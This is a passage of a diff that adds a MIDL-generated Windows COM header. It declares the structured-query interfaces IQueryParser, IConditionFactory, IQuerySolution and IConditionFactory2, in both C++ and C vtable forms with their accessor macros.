+            /* [in] */ __RPC__in LPCWSTR pszInputString,
+            /* [in] */ __RPC__in_opt IEnumUnknown *pCustomProperties,
+            /* [retval][out] */ __RPC__deref_out_opt IQuerySolution **ppSolution) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SetOption( 
+            /* [in] */ STRUCTURED_QUERY_SINGLE_OPTION option,
+            /* [in] */ __RPC__in const PROPVARIANT *pOptionValue) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetOption( 
+            /* [in] */ STRUCTURED_QUERY_SINGLE_OPTION option,
+            /* [retval][out] */ __RPC__out PROPVARIANT *pOptionValue) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SetMultiOption( 
+            /* [in] */ STRUCTURED_QUERY_MULTIOPTION option,
+            /* [in] */ __RPC__in LPCWSTR pszOptionKey,
+            /* [in] */ __RPC__in const PROPVARIANT *pOptionValue) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetSchemaProvider( 
+            /* [retval][out] */ __RPC__deref_out_opt ISchemaProvider **ppSchemaProvider) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RestateToString( 
+            /* [in] */ __RPC__in_opt ICondition *pCondition,
+            /* [in] */ BOOL fUseEnglish,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszQueryString) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ParsePropertyValue( 
+            /* [in] */ __RPC__in LPCWSTR pszPropertyName,
+            /* [in] */ __RPC__in LPCWSTR pszInputString,
+            /* [retval][out] */ __RPC__deref_out_opt IQuerySolution **ppSolution) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RestatePropertyValueToString( 
+            /* [in] */ __RPC__in_opt ICondition *pCondition,
+            /* [in] */ BOOL fUseEnglish,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszPropertyName,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszQueryString) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IQueryParserVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IQueryParser * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IQueryParser * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Parse )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ __RPC__in LPCWSTR pszInputString,
+            /* [in] */ __RPC__in_opt IEnumUnknown *pCustomProperties,
+            /* [retval][out] */ __RPC__deref_out_opt IQuerySolution **ppSolution);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetOption )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ STRUCTURED_QUERY_SINGLE_OPTION option,
+            /* [in] */ __RPC__in const PROPVARIANT *pOptionValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetOption )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ STRUCTURED_QUERY_SINGLE_OPTION option,
+            /* [retval][out] */ __RPC__out PROPVARIANT *pOptionValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetMultiOption )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ STRUCTURED_QUERY_MULTIOPTION option,
+            /* [in] */ __RPC__in LPCWSTR pszOptionKey,
+            /* [in] */ __RPC__in const PROPVARIANT *pOptionValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSchemaProvider )( 
+            __RPC__in IQueryParser * This,
+            /* [retval][out] */ __RPC__deref_out_opt ISchemaProvider **ppSchemaProvider);
+        
+        HRESULT ( STDMETHODCALLTYPE *RestateToString )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ __RPC__in_opt ICondition *pCondition,
+            /* [in] */ BOOL fUseEnglish,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszQueryString);
+        
+        HRESULT ( STDMETHODCALLTYPE *ParsePropertyValue )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ __RPC__in LPCWSTR pszPropertyName,
+            /* [in] */ __RPC__in LPCWSTR pszInputString,
+            /* [retval][out] */ __RPC__deref_out_opt IQuerySolution **ppSolution);
+        
+        HRESULT ( STDMETHODCALLTYPE *RestatePropertyValueToString )( 
+            __RPC__in IQueryParser * This,
+            /* [in] */ __RPC__in_opt ICondition *pCondition,
+            /* [in] */ BOOL fUseEnglish,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszPropertyName,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszQueryString);
+        
+        END_INTERFACE
+    } IQueryParserVtbl;
+
+    interface IQueryParser
+    {
+        CONST_VTBL struct IQueryParserVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IQueryParser_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IQueryParser_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IQueryParser_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IQueryParser_Parse(This,pszInputString,pCustomProperties,ppSolution)	\
+    ( (This)->lpVtbl -> Parse(This,pszInputString,pCustomProperties,ppSolution) ) 
+
+#define IQueryParser_SetOption(This,option,pOptionValue)	\
+    ( (This)->lpVtbl -> SetOption(This,option,pOptionValue) ) 
+
+#define IQueryParser_GetOption(This,option,pOptionValue)	\
+    ( (This)->lpVtbl -> GetOption(This,option,pOptionValue) ) 
+
+#define IQueryParser_SetMultiOption(This,option,pszOptionKey,pOptionValue)	\
+    ( (This)->lpVtbl -> SetMultiOption(This,option,pszOptionKey,pOptionValue) ) 
+
+#define IQueryParser_GetSchemaProvider(This,ppSchemaProvider)	\
+    ( (This)->lpVtbl -> GetSchemaProvider(This,ppSchemaProvider) ) 
+
+#define IQueryParser_RestateToString(This,pCondition,fUseEnglish,ppszQueryString)	\
+    ( (This)->lpVtbl -> RestateToString(This,pCondition,fUseEnglish,ppszQueryString) ) 
+
+#define IQueryParser_ParsePropertyValue(This,pszPropertyName,pszInputString,ppSolution)	\
+    ( (This)->lpVtbl -> ParsePropertyValue(This,pszPropertyName,pszInputString,ppSolution) ) 
+
+#define IQueryParser_RestatePropertyValueToString(This,pCondition,fUseEnglish,ppszPropertyName,ppszQueryString)	\
+    ( (This)->lpVtbl -> RestatePropertyValueToString(This,pCondition,fUseEnglish,ppszPropertyName,ppszQueryString) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IQueryParser_INTERFACE_DEFINED__ */
+
+
+#ifndef __IConditionFactory_INTERFACE_DEFINED__
+#define __IConditionFactory_INTERFACE_DEFINED__
+
+/* interface IConditionFactory */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IConditionFactory;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("A5EFE073-B16F-474f-9F3E-9F8B497A3E08")
+    IConditionFactory : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE MakeNot( 
+            /* [in] */ __RPC__in_opt ICondition *pcSub,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE MakeAndOr( 
+            /* [in] */ CONDITION_TYPE ct,
+            /* [in] */ __RPC__in_opt IEnumUnknown *peuSubs,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE MakeLeaf( 
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszPropertyName,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszValueType,
+            /* [in] */ __RPC__in const PROPVARIANT *ppropvar,
+            /* [in] */ __RPC__in_opt IRichChunk *pPropertyNameTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pOperationTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pValueTerm,
+            /* [in] */ BOOL fExpand,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE Resolve( 
+            /* [annotation][in] */ 
+            _In_  ICondition *pc,
+            /* [annotation][in] */ 
+            _In_  STRUCTURED_QUERY_RESOLVE_OPTION sqro,
+            /* [annotation][ref][in] */ 
+            _In_opt_  const SYSTEMTIME *pstReferenceTime,
+            /* [annotation][retval][out] */ 
+            _Out_  ICondition **ppcResolved) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IConditionFactoryVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IConditionFactory * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IConditionFactory * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IConditionFactory * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeNot )( 
+            __RPC__in IConditionFactory * This,
+            /* [in] */ __RPC__in_opt ICondition *pcSub,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeAndOr )( 
+            __RPC__in IConditionFactory * This,
+            /* [in] */ CONDITION_TYPE ct,
+            /* [in] */ __RPC__in_opt IEnumUnknown *peuSubs,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeLeaf )( 
+            __RPC__in IConditionFactory * This,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszPropertyName,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszValueType,
+            /* [in] */ __RPC__in const PROPVARIANT *ppropvar,
+            /* [in] */ __RPC__in_opt IRichChunk *pPropertyNameTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pOperationTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pValueTerm,
+            /* [in] */ BOOL fExpand,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Resolve )( 
+            IConditionFactory * This,
+            /* [annotation][in] */ 
+            _In_  ICondition *pc,
+            /* [annotation][in] */ 
+            _In_  STRUCTURED_QUERY_RESOLVE_OPTION sqro,
+            /* [annotation][ref][in] */ 
+            _In_opt_  const SYSTEMTIME *pstReferenceTime,
+            /* [annotation][retval][out] */ 
+            _Out_  ICondition **ppcResolved);
+        
+        END_INTERFACE
+    } IConditionFactoryVtbl;
+
+    interface IConditionFactory
+    {
+        CONST_VTBL struct IConditionFactoryVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IConditionFactory_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IConditionFactory_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IConditionFactory_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IConditionFactory_MakeNot(This,pcSub,fSimplify,ppcResult)	\
+    ( (This)->lpVtbl -> MakeNot(This,pcSub,fSimplify,ppcResult) ) 
+
+#define IConditionFactory_MakeAndOr(This,ct,peuSubs,fSimplify,ppcResult)	\
+    ( (This)->lpVtbl -> MakeAndOr(This,ct,peuSubs,fSimplify,ppcResult) ) 
+
+#define IConditionFactory_MakeLeaf(This,pszPropertyName,cop,pszValueType,ppropvar,pPropertyNameTerm,pOperationTerm,pValueTerm,fExpand,ppcResult)	\
+    ( (This)->lpVtbl -> MakeLeaf(This,pszPropertyName,cop,pszValueType,ppropvar,pPropertyNameTerm,pOperationTerm,pValueTerm,fExpand,ppcResult) ) 
+
+#define IConditionFactory_Resolve(This,pc,sqro,pstReferenceTime,ppcResolved)	\
+    ( (This)->lpVtbl -> Resolve(This,pc,sqro,pstReferenceTime,ppcResolved) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IConditionFactory_INTERFACE_DEFINED__ */
+
+
+#ifndef __IQuerySolution_INTERFACE_DEFINED__
+#define __IQuerySolution_INTERFACE_DEFINED__
+
+/* interface IQuerySolution */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IQuerySolution;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("D6EBC66B-8921-4193-AFDD-A1789FB7FF57")
+    IQuerySolution : public IConditionFactory
+    {
+    public:
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetQuery( 
+            /* [annotation][out] */ 
+            _Out_opt_  ICondition **ppQueryNode,
+            /* [annotation][out] */ 
+            _Out_opt_  IEntity **ppMainType) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetErrors( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **ppParseErrors) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetLexicalData( 
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszInputString,
+            /* [annotation][out] */ 
+            _Out_opt_  ITokenCollection **ppTokens,
+            /* [annotation][out] */ 
+            _Out_opt_  LCID *plcid,
+            /* [annotation][out] */ 
+            _Out_opt_  IUnknown **ppWordBreaker) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IQuerySolutionVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IQuerySolution * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IQuerySolution * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IQuerySolution * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeNot )( 
+            __RPC__in IQuerySolution * This,
+            /* [in] */ __RPC__in_opt ICondition *pcSub,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeAndOr )( 
+            __RPC__in IQuerySolution * This,
+            /* [in] */ CONDITION_TYPE ct,
+            /* [in] */ __RPC__in_opt IEnumUnknown *peuSubs,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeLeaf )( 
+            __RPC__in IQuerySolution * This,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszPropertyName,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszValueType,
+            /* [in] */ __RPC__in const PROPVARIANT *ppropvar,
+            /* [in] */ __RPC__in_opt IRichChunk *pPropertyNameTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pOperationTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pValueTerm,
+            /* [in] */ BOOL fExpand,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppcResult);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Resolve )( 
+            IQuerySolution * This,
+            /* [annotation][in] */ 
+            _In_  ICondition *pc,
+            /* [annotation][in] */ 
+            _In_  STRUCTURED_QUERY_RESOLVE_OPTION sqro,
+            /* [annotation][ref][in] */ 
+            _In_opt_  const SYSTEMTIME *pstReferenceTime,
+            /* [annotation][retval][out] */ 
+            _Out_  ICondition **ppcResolved);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetQuery )( 
+            IQuerySolution * This,
+            /* [annotation][out] */ 
+            _Out_opt_  ICondition **ppQueryNode,
+            /* [annotation][out] */ 
+            _Out_opt_  IEntity **ppMainType);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetErrors )( 
+            __RPC__in IQuerySolution * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **ppParseErrors);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetLexicalData )( 
+            IQuerySolution * This,
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszInputString,
+            /* [annotation][out] */ 
+            _Out_opt_  ITokenCollection **ppTokens,
+            /* [annotation][out] */ 
+            _Out_opt_  LCID *plcid,
+            /* [annotation][out] */ 
+            _Out_opt_  IUnknown **ppWordBreaker);
+        
+        END_INTERFACE
+    } IQuerySolutionVtbl;
+
+    interface IQuerySolution
+    {
+        CONST_VTBL struct IQuerySolutionVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IQuerySolution_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IQuerySolution_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IQuerySolution_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IQuerySolution_MakeNot(This,pcSub,fSimplify,ppcResult)	\
+    ( (This)->lpVtbl -> MakeNot(This,pcSub,fSimplify,ppcResult) ) 
+
+#define IQuerySolution_MakeAndOr(This,ct,peuSubs,fSimplify,ppcResult)	\
+    ( (This)->lpVtbl -> MakeAndOr(This,ct,peuSubs,fSimplify,ppcResult) ) 
+
+#define IQuerySolution_MakeLeaf(This,pszPropertyName,cop,pszValueType,ppropvar,pPropertyNameTerm,pOperationTerm,pValueTerm,fExpand,ppcResult)	\
+    ( (This)->lpVtbl -> MakeLeaf(This,pszPropertyName,cop,pszValueType,ppropvar,pPropertyNameTerm,pOperationTerm,pValueTerm,fExpand,ppcResult) ) 
+
+#define IQuerySolution_Resolve(This,pc,sqro,pstReferenceTime,ppcResolved)	\
+    ( (This)->lpVtbl -> Resolve(This,pc,sqro,pstReferenceTime,ppcResolved) ) 
+
+
+#define IQuerySolution_GetQuery(This,ppQueryNode,ppMainType)	\
+    ( (This)->lpVtbl -> GetQuery(This,ppQueryNode,ppMainType) ) 
+
+#define IQuerySolution_GetErrors(This,riid,ppParseErrors)	\
+    ( (This)->lpVtbl -> GetErrors(This,riid,ppParseErrors) ) 
+
+#define IQuerySolution_GetLexicalData(This,ppszInputString,ppTokens,plcid,ppWordBreaker)	\
+    ( (This)->lpVtbl -> GetLexicalData(This,ppszInputString,ppTokens,plcid,ppWordBreaker) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IQuerySolution_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_structuredquery_0000_0003 */
+/* [local] */ 
+
+typedef /* [v1_enum] */ 
+enum CONDITION_CREATION_OPTIONS
+    {
+        CONDITION_CREATION_DEFAULT	= 0,
+        CONDITION_CREATION_NONE	= 0,
+        CONDITION_CREATION_SIMPLIFY	= 0x1,
+        CONDITION_CREATION_VECTOR_AND	= 0x2,
+        CONDITION_CREATION_VECTOR_OR	= 0x4,
+        CONDITION_CREATION_VECTOR_LEAF	= 0x8,
+        CONDITION_CREATION_USE_CONTENT_LOCALE	= 0x10
+    } 	CONDITION_CREATION_OPTIONS;
+
+DEFINE_ENUM_FLAG_OPERATORS(CONDITION_CREATION_OPTIONS);
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0003_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0003_v0_0_s_ifspec;
+
+#ifndef __IConditionFactory2_INTERFACE_DEFINED__
+#define __IConditionFactory2_INTERFACE_DEFINED__
+
+/* interface IConditionFactory2 */
+/* [local][unique][object][uuid] */ 
+
+
+EXTERN_C const IID IID_IConditionFactory2;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("71D222E1-432F-429e-8C13-B6DAFDE5077A")
+    IConditionFactory2 : public IConditionFactory
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE CreateTrueFalse( 
+            /* [in] */ BOOL fVal,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateNegation( 
+            /* [in] */ ICondition *pcSub,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateCompoundFromObjectArray( 
+            /* [in] */ CONDITION_TYPE ct,
+            /* [annotation][in] */ 
+            _In_opt_  IObjectArray *poaSubs,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateCompoundFromArray( 
+            /* [in] */ CONDITION_TYPE ct,
+            /* [size_is][in] */ ICondition **ppcondSubs,
+            /* [in] */ ULONG cSubs,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateStringLeaf( 
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ LPCWSTR pszValue,
+            /* [annotation][in] */ 
+            _In_opt_  LPCWSTR pszLocaleName,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateIntegerLeaf( 
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ INT32 lValue,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateBooleanLeaf( 
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ BOOL fValue,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE CreateLeaf( 
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ REFPROPVARIANT propvar,
+            /* [annotation][in] */ 
+            _In_opt_  LPCWSTR pszSemanticType,
+            /* [annotation][in] */ 
+            _In_opt_  LPCWSTR pszLocaleName,
+            /* [annotation][in] */ 
+            _In_opt_  IRichChunk *pPropertyNameTerm,
+            /* [annotation][in] */ 
+            _In_opt_  IRichChunk *pOperationTerm,
+            /* [annotation][in] */ 
+            _In_opt_  IRichChunk *pValueTerm,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ResolveCondition( 
+            /* [in] */ ICondition *pc,
+            /* [in] */ STRUCTURED_QUERY_RESOLVE_OPTION sqro,
+            /* [annotation][in] */ 
+            _In_opt_  const SYSTEMTIME *pstReferenceTime,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IConditionFactory2Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            IConditionFactory2 * This,
+            /* [in] */ REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            IConditionFactory2 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            IConditionFactory2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeNot )( 
+            IConditionFactory2 * This,
+            /* [in] */ ICondition *pcSub,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ ICondition **ppcResult);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeAndOr )( 
+            IConditionFactory2 * This,
+            /* [in] */ CONDITION_TYPE ct,
+            /* [in] */ IEnumUnknown *peuSubs,
+            /* [in] */ BOOL fSimplify,
+            /* [retval][out] */ ICondition **ppcResult);
+        
+        HRESULT ( STDMETHODCALLTYPE *MakeLeaf )( 
+            IConditionFactory2 * This,
+            /* [unique][in] */ LPCWSTR pszPropertyName,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [unique][in] */ LPCWSTR pszValueType,
+            /* [in] */ const PROPVARIANT *ppropvar,
+            /* [in] */ IRichChunk *pPropertyNameTerm,
+            /* [in] */ IRichChunk *pOperationTerm,
+            /* [in] */ IRichChunk *pValueTerm,
+            /* [in] */ BOOL fExpand,
+            /* [retval][out] */ ICondition **ppcResult);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Resolve )( 
+            IConditionFactory2 * This,
+            /* [annotation][in] */ 
+            _In_  ICondition *pc,
+            /* [annotation][in] */ 
+            _In_  STRUCTURED_QUERY_RESOLVE_OPTION sqro,
+            /* [annotation][ref][in] */ 
+            _In_opt_  const SYSTEMTIME *pstReferenceTime,
+            /* [annotation][retval][out] */ 
+            _Out_  ICondition **ppcResolved);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateTrueFalse )( 
+            IConditionFactory2 * This,
+            /* [in] */ BOOL fVal,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateNegation )( 
+            IConditionFactory2 * This,
+            /* [in] */ ICondition *pcSub,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateCompoundFromObjectArray )( 
+            IConditionFactory2 * This,
+            /* [in] */ CONDITION_TYPE ct,
+            /* [annotation][in] */ 
+            _In_opt_  IObjectArray *poaSubs,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateCompoundFromArray )( 
+            IConditionFactory2 * This,
+            /* [in] */ CONDITION_TYPE ct,
+            /* [size_is][in] */ ICondition **ppcondSubs,
+            /* [in] */ ULONG cSubs,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateStringLeaf )( 
+            IConditionFactory2 * This,
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ LPCWSTR pszValue,
+            /* [annotation][in] */ 
+            _In_opt_  LPCWSTR pszLocaleName,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateIntegerLeaf )( 
+            IConditionFactory2 * This,
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ INT32 lValue,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateBooleanLeaf )( 
+            IConditionFactory2 * This,
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ BOOL fValue,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateLeaf )( 
+            IConditionFactory2 * This,
+            /* [in] */ REFPROPERTYKEY propkey,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [in] */ REFPROPVARIANT propvar,
+            /* [annotation][in] */ 
+            _In_opt_  LPCWSTR pszSemanticType,
+            /* [annotation][in] */ 
+            _In_opt_  LPCWSTR pszLocaleName,
+            /* [annotation][in] */ 
+            _In_opt_  IRichChunk *pPropertyNameTerm,
+            /* [annotation][in] */ 
+            _In_opt_  IRichChunk *pOperationTerm,
+            /* [annotation][in] */ 
+            _In_opt_  IRichChunk *pValueTerm,
+            /* [in] */ CONDITION_CREATION_OPTIONS cco,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        HRESULT ( STDMETHODCALLTYPE *ResolveCondition )( 
+            IConditionFactory2 * This,
+            /* [in] */ ICondition *pc,
